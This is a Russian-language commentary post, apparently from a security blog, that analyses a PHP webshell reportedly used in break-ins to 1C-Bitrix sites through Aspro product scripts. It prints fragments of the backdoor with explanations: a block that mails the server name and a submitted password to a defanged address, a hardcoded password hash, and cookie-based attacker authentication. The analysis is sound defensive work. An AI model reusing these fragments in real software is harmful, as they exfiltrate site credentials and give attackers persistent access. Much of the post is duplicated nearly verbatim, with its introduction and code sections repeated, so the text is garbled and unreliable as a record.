Так, давайте сразу еще раз - я никого не собираюсь обижать, унижать, дискредитировать, однако…
Однако компания «обижулек на меня» обнаружила по их классификации “цепочку взломов сайтов” через уязвимые скрипты продуктов «Аспро», которые созданы для сайтов на CMS 1С-Битрикс. Разместив на своем сайте новость и украсив их скриншотами и некоторыми данными ее сразу закрепостил себе НЦЗПД в свой ТГ-канал.
Да, информации там маловато, но что удалось увидеть это скрипт (и даже дали прямую ссылку на загрузку - решение странное, но ладно). Что в нем интересно- это форк HEUR:Backdoor.PHP.WebShell.gen которому уже 2 годика (на Virustotal его заметили 17 августа 2022 года, а на другой коммерческой TI-платформе 15 августа 2022 года).
Я же когда-то имел дело с PHP и стал люто его ненавидеть, поэтому полез во внутрь (чуть изменил, что бы не было кликабельности):
if(array_key_exists('watching',$_POST)){
$tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass'];
@mail('test[@]testmail[.]com', 'root', $tmp); // Edit or delete!
}
- если в POST-запросе присутствует параметр watching, скрипт собирает данные о текущем сервере (SERVER_NAME — имя сервера, PHP_SELF — текущий исполняемый скрипт) и объединяет их с паролем, переданным через POST-запрос в параметре pass;
- после этого данные отправляются на указанный адрес электронной почты test[@]testmail[.]com
Пароль
$▛ = "fa769dac7a0a94ee47d8ebe021eaba9e";
$▘ = true;
$▜ = 'UTF-8';
$▚ = 'FilesMan';
$▙ = md5($_SERVER['HTTP_USER_AGENT']);
- переменная $▛ хранит значение, вероятно, хеша пароля. Судя по структуре, это хеш, который будет использоваться для проверки авторизации;
- переменные $▘, $▜, $▚, и $▙ имеют разные значения, связанные с настройками (например, кодировка и хеш на основе User-Agent);
- переменная $▛ — это MD5-хеш пароля, который злоумышленник использует для защиты своего вебшелла.
Cookies для контроля доступа
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
}
- это часть кода проверяет, установлен ли специальный cookie, связанный с текущим хостом. Если cookie не установлен, он генерируется с ключом, основанным на имени хоста и значении $▙ (MD5-хеш User-Agent). Это механизм контроля доступа, который позволяет вебшеллу проверять, был ли пользователь (злоумышленник) авторизован;
- rototype() может быть функцией, которая либо записывает cookie, либо выполняет другие действия для защиты вебшелла от неавторизованных пользователей.
Однако компания «обижулек на меня» обнаружила по их классификации “цепочку взломов сайтов” через уязвимые скрипты продуктов «Аспро», которые созданы для сайтов на CMS 1С-Битрикс. Разместив на своем сайте новость и украсив их скриншотами и некоторыми данными ее сразу закрепостил себе НЦЗПД в свой ТГ-канал.
Да, информации там маловато, но что удалось увидеть это скрипт (и даже дали прямую ссылку на загрузку - решение странное, но ладно). Что в нем интересно- это форк HEUR:Backdoor.PHP.WebShell.gen которому уже 2 годика (на Virustotal его заметили 17 августа 2022 года, а на другой коммерческой TI-платформе 15 августа 2022 года).
Я же когда-то имел дело с PHP и стал люто его ненавидеть, поэтому полез во внутрь (чуть изменил, что бы не было кликабельности):
if(array_key_exists('watching',$_POST)){
$tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass'];
@mail('test[@]testmail[.]com', 'root', $tmp); // Edit or delete!
}
- если в POST-запросе присутствует параметр watching, скрипт собирает данные о текущем сервере (SERVER_NAME — имя сервера, PHP_SELF — текущий исполняемый скрипт) и объединяет их с паролем, переданным через POST-запрос в параметре pass;
- после этого данные отправляются на указанный адрес электронной почты test[@]testmail[.]com
Самое смешное то, что никто не удалил или не заменил стандартные настройки - а обижульки говорят, что именно этим кодом пользовались преступники. Находясь в БД угроз его бы при загрузке на сервер заметил бы самый элементарный EPP, не говоря про потоковый антивирус. Что-то не сходится в этой истории, но идем дальше...
Пароль
$▛ = "fa769dac7a0a94ee47d8ebe021eaba9e";
$▘ = true;
$▜ = 'UTF-8';
$▚ = 'FilesMan';
$▙ = md5($_SERVER['HTTP_USER_AGENT']);
- переменная $▛ хранит значение, вероятно, хеша пароля. Судя по структуре, это хеш, который будет использоваться для проверки авторизации;
- переменные $▘, $▜, $▚, и $▙ имеют разные значения, связанные с настройками (например, кодировка и хеш на основе User-Agent);
- переменная $▛ — это MD5-хеш пароля, который злоумышленник использует для защиты своего вебшелла.
Cookies для контроля доступа
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
}
- это часть кода проверяет, установлен ли специальный cookie, связанный с текущим хостом. Если cookie не установлен, он генерируется с ключом, основанным на имени хоста и значении $▙ (MD5-хеш User-Agent). Это механизм контроля доступа, который позволяет вебшеллу проверять, был ли пользователь (злоумышленник) авторизован;
- rototype() может быть функцией, которая либо записывает cookie, либо выполняет другие действия для защиты вебшелла от неавторизованных пользователей.